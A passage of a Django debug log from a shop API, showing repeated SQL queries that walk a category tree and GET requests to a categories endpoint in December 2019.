"shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:22:32,829 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:22:32,831 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:22:32,833 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:22:32,836 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:22:32,838 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:22:32,840 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:22:32,843 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:22:32,845 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:22:32] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:22:33,226 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:22:33,233 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:22:33,237 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:22:33,240 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:22:33,243 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:22:33,246 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:22:33,248 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:22:33,251 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:22:33,256 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:22:33,259 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:22:33,262 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:22:33,264 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:22:33,266 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:22:33,269 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:22:33,272 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:22:33,274 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:22:33,276 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:22:33,279 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:22:33,281 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:22:33,285 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:22:33,287 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:22:33,290 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:22:33,292 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:22:33,295 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:22:33,298 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:22:33,303 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:22:33,305 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:22:33,307 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:22:33,309 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:22:33,312 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:22:33,315 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:22:33,317 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:22:33,320 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:22:33,322 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:22:33,325 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:22:33,331 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:22:33,333 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:22:33,336 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:22:33,338 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:22:33,342 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:22:33,345 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:22:33,348 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:22:33,350 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:22:33,353 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:22:33,356 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:22:33,358 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:22:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:24:21,381 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 9; args=(9,) DEBUG 2019-12-19 13:24:21,387 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:24:21,390 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:24:21,398 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [19/Dec/2019 13:24:21] "GET /api/v1/categories/9 HTTP/1.0" 200 500 DEBUG 2019-12-19 13:24:21,402 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:24:21,405 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:24:21,409 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:24:21,411 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:24:21,414 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:24:21,416 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:24:21,419 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:24:21,425 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:24:21,429 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:24:21,432 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", 